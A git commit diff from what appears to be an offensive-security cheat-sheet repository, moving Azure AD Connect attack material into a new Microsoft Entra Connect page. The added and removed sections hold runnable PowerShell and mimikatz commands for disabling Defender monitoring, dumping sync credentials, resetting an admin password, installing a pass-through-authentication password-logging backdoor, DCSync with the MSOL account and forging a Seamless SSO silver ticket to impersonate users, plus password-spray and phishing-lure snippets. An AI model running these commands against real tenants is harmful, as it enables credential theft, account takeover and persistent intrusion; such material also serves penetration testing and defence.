Azure AD Connect
parent
8a796c3e8e
commit
a432ae494e
|
@ -329,6 +329,18 @@ root@payload$ ./bloodhound --no-sandbox
|
||||||
Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4J, pass:neo4j
|
Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4J, pass:neo4j
|
||||||
```
|
```
|
||||||
|
|
||||||
|
NOTE: Currently BloodHound Community Edition is still a work in progress, it is highly recommended to stay on the original [BloodHoundAD/BloodHound](https://github.com/BloodHoundAD/BloodHound/) version.
|
||||||
|
|
||||||
|
```ps1
|
||||||
|
git clone https://github.com/SpecterOps/BloodHound
|
||||||
|
cd examples/docker-compose/
|
||||||
|
cat docker-compose.yml | docker compose -f - up
|
||||||
|
# UI: http://localhost:8080/ui/login
|
||||||
|
# Username: admin
|
||||||
|
# Password: see your Docker logs
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
You can add some custom queries like :
|
You can add some custom queries like :
|
||||||
* [Bloodhound-Custom-Queries from @hausec](https://github.com/hausec/Bloodhound-Custom-Queries/blob/master/customqueries.json)
|
* [Bloodhound-Custom-Queries from @hausec](https://github.com/hausec/Bloodhound-Custom-Queries/blob/master/customqueries.json)
|
||||||
* [BloodHoundQueries from CompassSecurity](https://github.com/CompassSecurity/BloodHoundQueries/blob/master/customqueries.json)
|
* [BloodHoundQueries from CompassSecurity](https://github.com/CompassSecurity/BloodHoundQueries/blob/master/customqueries.json)
|
||||||
|
|
|
@ -39,9 +39,6 @@
|
||||||
* [Password Spray](#password-spray)
|
* [Password Spray](#password-spray)
|
||||||
* [Convert GUID to SID](#convert-guid-to-sid)
|
* [Convert GUID to SID](#convert-guid-to-sid)
|
||||||
* [Azure AD Connect](#azure-ad-connect)
|
* [Azure AD Connect](#azure-ad-connect)
|
||||||
* [Azure AD Connect - Password extraction](#azure-ad-connect---password-extraction)
|
|
||||||
* [Azure AD Connect - MSOL Account's password and DCSync](#azure-ad-connect---msol-accounts-password-and-dcsync)
|
|
||||||
* [Azure AD Connect - Seamless Single Sign On Silver Ticket](#azure-ad-connect---seamless-single-sign-on-silver-ticket)
|
|
||||||
* [References](#references)
|
* [References](#references)
|
||||||
|
|
||||||
## Azure Recon Tools
|
## Azure Recon Tools
|
||||||
|
@ -832,105 +829,11 @@ SID: S-1–12–1-[base10(a1)]-[ base10(a2)]-[ base10(a3)]-[ base10(a4)]
|
||||||
|
|
||||||
For example, the representation of `6aa89ecb-1f8f-4d92–810d-b0dce30b6c82` is `S-1–12–1–1789435595–1301421967–3702525313–2188119011`
|
For example, the representation of `6aa89ecb-1f8f-4d92–810d-b0dce30b6c82` is `S-1–12–1–1789435595–1301421967–3702525313–2188119011`
|
||||||
|
|
||||||
## Azure AD Connect
|
|
||||||
|
|
||||||
Check if Azure AD Connect is installed : `Get-ADSyncConnector`
|
|
||||||
|
|
||||||
* For **PHS**, we can extract the credentials
|
|
||||||
* For **PTA**, we can install the agent
|
|
||||||
* For **Federation**, we can extract the certificate from ADFS server using DA
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
PS > Set-MpPreference -DisableRealtimeMonitoring $true
|
|
||||||
PS > Copy-Item -ToSession $adcnct -Path C:\Tools\AADInternals.0.4.5.zip -Destination C:\Users\Administrator\Documents
|
|
||||||
PS > Expand-Archive C:\Users\Administrator\Documents\AADInternals.0.4.5.zip -DestinationPath C:\Users\Administrator\Documents\AADInternals
|
|
||||||
PS > Import-Module C:\Users\Administrator\Documents\AADInternals\AADInternals.psd1
|
|
||||||
PS > Get-AADIntSyncCredentials
|
|
||||||
|
|
||||||
# Get Token for SYNC account and reset on-prem admin password
|
|
||||||
PS > $passwd = ConvertToSecureString 'password' -AsPlainText -Force
|
|
||||||
PS > $creds = New-Object System.Management.Automation.PSCredential ("<Username>@<TenantName>.onmicrosoft.com", $passwd)
|
|
||||||
PS > GetAADIntAccessTokenForAADGraph -Credentials $creds –SaveToCache
|
|
||||||
PS > Get-AADIntUser -UserPrincipalName onpremadmin@defcorpsecure.onmicrosoft.com | select ImmutableId
|
|
||||||
PS > Set-AADIntUserPassword -SourceAnchor "<IMMUTABLE-ID>" -Password "Password" -Verbose
|
|
||||||
```
|
|
||||||
|
|
||||||
1. Check if PTA is installed : `Get-Command -Module PassthroughAuthPSModule`
|
|
||||||
2. Install a PTA Backdoor
|
|
||||||
```powershell
|
|
||||||
PS AADInternals> Install-AADIntPTASpy
|
|
||||||
PS AADInternals> Get-AADIntPTASpyLog -DecodePasswords
|
|
||||||
```
|
|
||||||
|
|
||||||
|
|
||||||
### Azure AD Connect - Password extraction
|
|
||||||
|
|
||||||
Credentials in AD Sync : C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf
|
|
||||||
|
|
||||||
Tool | Requires code execution on target | DLL dependencies | Requires MSSQL locally | Requires python locally
|
|
||||||
--- | --- | --- | --- | ---
|
|
||||||
ADSyncDecrypt | Yes | Yes | No | No
|
|
||||||
ADSyncGather | Yes | No | No | Yes
|
|
||||||
ADSyncQuery | No (network RPC calls only) | No | Yes | Yes
|
|
||||||
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
git clone https://github.com/fox-it/adconnectdump
|
|
||||||
# DCSync with AD Sync account
|
|
||||||
```
|
|
||||||
|
|
||||||
### Azure AD Connect - MSOL Account's password and DCSync
|
|
||||||
|
|
||||||
You can perform **DCSync** attack using the MSOL account.
|
|
||||||
|
|
||||||
Requirements:
|
|
||||||
* Compromise a server with Azure AD Connect service
|
|
||||||
* Access to ADSyncAdmins or local Administrators groups
|
|
||||||
|
|
||||||
Use the script **azuread_decrypt_msol.ps1** from @xpn to recover the decrypted password for the MSOL account:
|
|
||||||
* `azuread_decrypt_msol.ps1`: AD Connect Sync Credential Extract POC https://gist.github.com/xpn/0dc393e944d8733e3c63023968583545
|
|
||||||
* `azuread_decrypt_msol_v2.ps1`: Updated method of dumping the MSOL service account (which allows a DCSync) used by Azure AD Connect Sync https://gist.github.com/xpn/f12b145dba16c2eebdd1c6829267b90c
|
|
||||||
|
|
||||||
Now you can use the retrieved credentials for the MSOL Account to launch a DCSync attack.
|
|
||||||
|
|
||||||
|
|
||||||
### Azure AD Connect - Seamless Single Sign On Silver Ticket
|
|
||||||
|
|
||||||
> Anyone who can edit properties of the AZUREADSSOACCS$ account can impersonate any user in Azure AD using Kerberos (if no MFA)
|
|
||||||
|
|
||||||
> Seamless SSO is supported by both PHS and PTA. If seamless SSO is enabled, a computer account **AZUREADSSOC** is created in the on-prem AD.
|
|
||||||
|
|
||||||
:warning: The password of the AZUREADSSOACC account never changes.
|
|
||||||
|
|
||||||
Using [https://autologon.microsoftazuread-sso.com/](https://autologon.microsoftazuread-sso.com/) to convert Kerberos tickets to SAML and JWT for Office 365 & Azure
|
|
||||||
|
|
||||||
1. NTLM password hash of the AZUREADSSOACC account, e.g. `f9969e088b2c13d93833d0ce436c76dd`.
|
|
||||||
```powershell
|
|
||||||
mimikatz.exe "lsadump::dcsync /user:AZUREADSSOACC$" exit
|
|
||||||
```
|
|
||||||
2. AAD logon name of the user we want to impersonate, e.g. `elrond@contoso.com`. This is typically either his userPrincipalName or mail attribute from the on-prem AD.
|
|
||||||
3. SID of the user we want to impersonate, e.g. `S-1-5-21-2121516926-2695913149-3163778339-1234`.
|
|
||||||
4. Create the Silver Ticket and inject it into Kerberos cache:
|
|
||||||
```powershell
|
|
||||||
mimikatz.exe "kerberos::golden /user:elrond
|
|
||||||
/sid:S-1-5-21-2121516926-2695913149-3163778339 /id:1234
|
|
||||||
/domain:contoso.local /rc4:f9969e088b2c13d93833d0ce436c76dd
|
|
||||||
/target:aadg.windows.net.nsatc.net /service:HTTP /ptt" exit
|
|
||||||
```
|
|
||||||
5. Launch Mozilla Firefox
|
|
||||||
6. Go to about:config and set the `network.negotiate-auth.trusted-uris preference` to value `https://aadg.windows.net.nsatc.net,https://autologon.microsoftazuread-sso.com`
|
|
||||||
7. Navigate to any web application that is integrated with our AAD domain. Fill in the user name, while leaving the password field empty.
|
|
||||||
|
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
* [Introduction To 365-Stealer - Understanding and Executing the Illicit Consent Grant Attack](https://www.alteredsecurity.com/post/introduction-to-365-stealer)
|
|
||||||
* [Learn with @trouble1_raunak: Cloud Pentesting - Azure (Illicit Consent Grant Attack) !!](https://www.youtube.com/watch?v=51FSvndgddk&list=WL)
|
|
||||||
* [Pass-the-PRT attack and detection by Microsoft Defender for … - Derk van der Woude - Jun 9](https://derkvanderwoude.medium.com/pass-the-prt-attack-and-detection-by-microsoft-defender-for-afd7dbe83c94)
|
|
||||||
* [Azure AD Pass The Certificate - Mor - Aug 19, 2020](https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597)
|
* [Azure AD Pass The Certificate - Mor - Aug 19, 2020](https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597)
|
||||||
* [Get Access Tokens for Managed Service Identity on Azure App Service](https://zhiliaxu.github.io/app-service-managed-identity.html)
|
* [Get Access Tokens for Managed Service Identity on Azure App Service](https://zhiliaxu.github.io/app-service-managed-identity.html)
|
||||||
* [Bypassing conditional access by faking device compliance - September 06, 2020 - @DrAzureAD](https://o365blog.com/post/mdm/)
|
|
||||||
* [CARTP-cheatsheet - Azure AD cheatsheet for the CARTP course](https://github.com/0xJs/CARTP-cheatsheet/blob/main/Authenticated-enumeration.md)
|
|
||||||
* [Get-AzurePasswords: A Tool for Dumping Credentials from Azure Subscriptions - August 28, 2018 - Karl Fosaaen](https://www.netspi.com/blog/technical/cloud-penetration-testing/get-azurepasswords/)
|
* [Get-AzurePasswords: A Tool for Dumping Credentials from Azure Subscriptions - August 28, 2018 - Karl Fosaaen](https://www.netspi.com/blog/technical/cloud-penetration-testing/get-azurepasswords/)
|
||||||
* [An introduction to penetration testing Azure - Akimbocore](https://akimbocore.com/article/introduction-to-pentesting-azure/)
|
* [An introduction to penetration testing Azure - Akimbocore](https://akimbocore.com/article/introduction-to-pentesting-azure/)
|
||||||
* [Running Powershell scripts on Azure VM - Netspi](https://blog.netspi.com/running-powershell-scripts-on-azure-vms/)
|
* [Running Powershell scripts on Azure VM - Netspi](https://blog.netspi.com/running-powershell-scripts-on-azure-vms/)
|
||||||
|
@ -948,6 +851,5 @@ Using [https://autologon.microsoftazuread-sso.com/](https://autologon.microsofta
|
||||||
* [Moving laterally between Azure AD joined machines - Tal Maor - Mar 17, 2020](https://medium.com/@talthemaor/moving-laterally-between-azure-ad-joined-machines-ed1f8871da56)
|
* [Moving laterally between Azure AD joined machines - Tal Maor - Mar 17, 2020](https://medium.com/@talthemaor/moving-laterally-between-azure-ad-joined-machines-ed1f8871da56)
|
||||||
* [AZURE AD INTRODUCTION FOR RED TEAMERS - Written by Aymeric Palhière (bak) - 2020-04-20](https://www.synacktiv.com/posts/pentest/azure-ad-introduction-for-red-teamers.html)
|
* [AZURE AD INTRODUCTION FOR RED TEAMERS - Written by Aymeric Palhière (bak) - 2020-04-20](https://www.synacktiv.com/posts/pentest/azure-ad-introduction-for-red-teamers.html)
|
||||||
* [Impersonating Office 365 Users With Mimikatz - January 15, 2017 - Michael Grafnetter](https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/)
|
* [Impersonating Office 365 Users With Mimikatz - January 15, 2017 - Michael Grafnetter](https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/)
|
||||||
* [The Art of the Device Code Phish - Bobby Cooke](https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html)
|
|
||||||
* [AZURE AD cheatsheet - BlackWasp](https://hideandsec.sh/books/cheatsheets-82c/page/azure-ad)
|
* [AZURE AD cheatsheet - BlackWasp](https://hideandsec.sh/books/cheatsheets-82c/page/azure-ad)
|
||||||
* [Azure AD Kerberos Tickets: Pivoting to the Cloud - Edwin David - February 09, 2023](https://trustedsec.com/blog/azure-ad-kerberos-tickets-pivoting-to-the-cloud)
|
* [Azure AD Kerberos Tickets: Pivoting to the Cloud - Edwin David - February 09, 2023](https://trustedsec.com/blog/azure-ad-kerberos-tickets-pivoting-to-the-cloud)
|
|
@ -215,4 +215,5 @@ $Tokens
|
||||||
|
|
||||||
* [Hacking Your Cloud: Tokens Edition 2.0 - Edwin David - April 13, 2023](https://trustedsec.com/blog/hacking-your-cloud-tokens-edition-2-0)
|
* [Hacking Your Cloud: Tokens Edition 2.0 - Edwin David - April 13, 2023](https://trustedsec.com/blog/hacking-your-cloud-tokens-edition-2-0)
|
||||||
* [Microsoft 365 Developer Program](https://developer.microsoft.com/en-us/microsoft-365/dev-program)
|
* [Microsoft 365 Developer Program](https://developer.microsoft.com/en-us/microsoft-365/dev-program)
|
||||||
* [PRT Abuse from Userland with Cobalt Strike - 0xbad53c](https://red.0xbad53c.com/red-team-operations/azure-and-o365/prt-abuse-from-userland-with-cobalt-strike)
|
* [PRT Abuse from Userland with Cobalt Strike - 0xbad53c](https://red.0xbad53c.com/red-team-operations/azure-and-o365/prt-abuse-from-userland-with-cobalt-strike)
|
||||||
|
* [Pass-the-PRT attack and detection by Microsoft Defender for … - Derk van der Woude - Jun 9](https://derkvanderwoude.medium.com/pass-the-prt-attack-and-detection-by-microsoft-defender-for-afd7dbe83c94)
|
|
@ -1,12 +1,103 @@
|
||||||
# Microsoft Entra Connect
|
# Microsoft Entra Connect
|
||||||
|
|
||||||
|
Check if Azure AD Connect is installed : `Get-ADSyncConnector`
|
||||||
|
|
||||||
|
* For **PHS**, we can extract the credentials
|
||||||
|
* For **PTA**, we can install the agent
|
||||||
|
* For **Federation**, we can extract the certificate from ADFS server using DA
|
||||||
|
|
||||||
|
|
||||||
## Password Hash Synchronization
|
## Password Hash Synchronization
|
||||||
|
|
||||||
|
Get token for `SYNC_*` account and reset on-prem admin password
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
PS > Import-Module C:\Users\Administrator\Documents\AADInternals\AADInternals.psd1
|
||||||
|
PS > Get-AADIntSyncCredentials
|
||||||
|
|
||||||
|
PS > $passwd = ConvertToSecureString 'password' -AsPlainText -Force
|
||||||
|
PS > $creds = New-Object System.Management.Automation.PSCredential ("<Username>@<TenantName>.onmicrosoft.com", $passwd)
|
||||||
|
PS > GetAADIntAccessTokenForAADGraph -Credentials $creds –SaveToCache
|
||||||
|
|
||||||
|
PS > Get-AADIntUser -UserPrincipalName onpremadmin@defcorpsecure.onmicrosoft.com | select ImmutableId
|
||||||
|
PS > Set-AADIntUserPassword -SourceAnchor "<IMMUTABLE-ID>" -Password "Password" -Verbose
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## Pass-Through Authentication
|
## Pass-Through Authentication
|
||||||
|
|
||||||
|
1. Check if PTA is installed : `Get-Command -Module PassthroughAuthPSModule`
|
||||||
|
2. Install a PTA Backdoor
|
||||||
|
```powershell
|
||||||
|
PS AADInternals> Install-AADIntPTASpy
|
||||||
|
PS AADInternals> Get-AADIntPTASpyLog -DecodePasswords
|
||||||
|
```
|
||||||
|
|
||||||
## Federation
|
## Federation
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
## AD Connect - Credentials
|
||||||
|
|
||||||
|
* [dirkjanm/adconnectdump](https://github.com/dirkjanm/adconnectdump) - Dump Azure AD Connect credentials for Azure AD and Active Directory
|
||||||
|
|
||||||
|
Tool | Requires code execution on target | DLL dependencies | Requires MSSQL locally | Requires python locally
|
||||||
|
--- | --- | --- | --- | ---
|
||||||
|
ADSyncDecrypt | Yes | Yes | No | No
|
||||||
|
ADSyncGather | Yes | No | No | Yes
|
||||||
|
ADSyncQuery | No (network RPC calls only) | No | Yes | Yes
|
||||||
|
|
||||||
|
* **ADSyncDecrypt**: Decrypts the credentials fully on the target host. Requires the AD Connect DLLs to be in the PATH. A similar version in PowerShell was released by Adam Chester on his blog.
|
||||||
|
* **ADSyncGather**: Queries the credentials and the encryption keys on the target host, decryption is done locally (python). No DLL dependencies.
|
||||||
|
* **ADSyncQuery**: Queries the credentials from the database that is saved locally. Requires MSSQL LocalDB to be installed. No DLL dependencies. Is called from adconnectdump.py, dumps data without executing anything on the Azure AD connect host.
|
||||||
|
|
||||||
|
Credentials in ADSync : `C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf`
|
||||||
|
|
||||||
|
|
||||||
|
## AD Connect - DCSync with MSOL Account
|
||||||
|
|
||||||
|
You can perform **DCSync** attack using the MSOL account.
|
||||||
|
|
||||||
|
Requirements:
|
||||||
|
* Compromise a server with Azure AD Connect service
|
||||||
|
* Access to ADSyncAdmins or local Administrators groups
|
||||||
|
|
||||||
|
Use the script **azuread_decrypt_msol.ps1** from @xpn to recover the decrypted password for the MSOL account:
|
||||||
|
* `azuread_decrypt_msol.ps1`: AD Connect Sync Credential Extract POC https://gist.github.com/xpn/0dc393e944d8733e3c63023968583545
|
||||||
|
* `azuread_decrypt_msol_v2.ps1`: Updated method of dumping the MSOL service account (which allows a DCSync) used by Azure AD Connect Sync https://gist.github.com/xpn/f12b145dba16c2eebdd1c6829267b90c
|
||||||
|
|
||||||
|
Now you can use the retrieved credentials for the MSOL Account to launch a DCSync attack.
|
||||||
|
|
||||||
|
|
||||||
|
## AD Connect - Seamless Single Sign On Silver Ticket
|
||||||
|
|
||||||
|
> Anyone who can edit properties of the AZUREADSSOACCS$ account can impersonate any user in Azure AD using Kerberos (if no MFA)
|
||||||
|
|
||||||
|
> Seamless SSO is supported by both PHS and PTA. If seamless SSO is enabled, a computer account **AZUREADSSOC** is created in the on-prem AD.
|
||||||
|
|
||||||
|
:warning: The password of the AZUREADSSOACC account never changes.
|
||||||
|
|
||||||
|
Using [https://autologon.microsoftazuread-sso.com/](https://autologon.microsoftazuread-sso.com/) to convert Kerberos tickets to SAML and JWT for Office 365 & Azure
|
||||||
|
|
||||||
|
1. NTLM password hash of the AZUREADSSOACC account, e.g. `f9969e088b2c13d93833d0ce436c76dd`.
|
||||||
|
```powershell
|
||||||
|
mimikatz.exe "lsadump::dcsync /user:AZUREADSSOACC$" exit
|
||||||
|
```
|
||||||
|
2. AAD logon name of the user we want to impersonate, e.g. `elrond@contoso.com`. This is typically either his userPrincipalName or mail attribute from the on-prem AD.
|
||||||
|
3. SID of the user we want to impersonate, e.g. `S-1-5-21-2121516926-2695913149-3163778339-1234`.
|
||||||
|
4. Create the Silver Ticket and inject it into Kerberos cache:
|
||||||
|
```powershell
|
||||||
|
mimikatz.exe "kerberos::golden /user:elrond
|
||||||
|
/sid:S-1-5-21-2121516926-2695913149-3163778339 /id:1234
|
||||||
|
/domain:contoso.local /rc4:f9969e088b2c13d93833d0ce436c76dd
|
||||||
|
/target:aadg.windows.net.nsatc.net /service:HTTP /ptt" exit
|
||||||
|
```
|
||||||
|
5. Launch Mozilla Firefox
|
||||||
|
6. Go to about:config and set the `network.negotiate-auth.trusted-uris preference` to value `https://aadg.windows.net.nsatc.net,https://autologon.microsoftazuread-sso.com`
|
||||||
|
7. Navigate to any web application that is integrated with our AAD domain. Fill in the user name, while leaving the password field empty.
|
||||||
|
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
* [Introduction to Microsoft Entra Connect V2 - Microsoft](https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/whatis-azure-ad-connect-v2)
|
* [Introduction to Microsoft Entra Connect V2 - Microsoft](https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/whatis-azure-ad-connect-v2)
|
||||||
|
* [TR19: I'm in your cloud, reading everyone's emails - hacking Azure AD via Active Directory - Dirk-jan Mollema - 1st apr. 2019](https://www.youtube.com/watch?v=JEIR5oGCwdg)
|
|
@ -68,3 +68,8 @@ Invoke-MFASweep -Username targetuser@targetdomain.com -Password Winter2020
|
||||||
Invoke-MFASweep -Username targetuser@targetdomain.com -Password Winter2020 -Recon -IncludeADFS
|
Invoke-MFASweep -Username targetuser@targetdomain.com -Password Winter2020 -Recon -IncludeADFS
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## References
|
||||||
|
|
||||||
|
* [Bypassing conditional access by faking device compliance - September 06, 2020 - @DrAzureAD](https://o365blog.com/post/mdm/)
|
||||||
|
* [CARTP-cheatsheet - Azure AD cheatsheet for the CARTP course](https://github.com/0xJs/CARTP-cheatsheet/blob/main/Authenticated-enumeration.md)
|
|
@ -121,3 +121,10 @@ roadtx codeauth -c <app-id> -r msgraph -t <tenant-id> <0.A....> -ru 'https://<ph
|
||||||
: lures create o365
|
: lures create o365
|
||||||
: lures get-url 0
|
: lures get-url 0
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## References
|
||||||
|
|
||||||
|
* [Introduction To 365-Stealer - Understanding and Executing the Illicit Consent Grant Attack](https://www.alteredsecurity.com/post/introduction-to-365-stealer)
|
||||||
|
* [Learn with @trouble1_raunak: Cloud Pentesting - Azure (Illicit Consent Grant Attack) !!](https://www.youtube.com/watch?v=51FSvndgddk&list=WL)
|
||||||
|
* [The Art of the Device Code Phish - Bobby Cooke](https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html)
|
||||||
|
|
Loading…
Reference in New Issue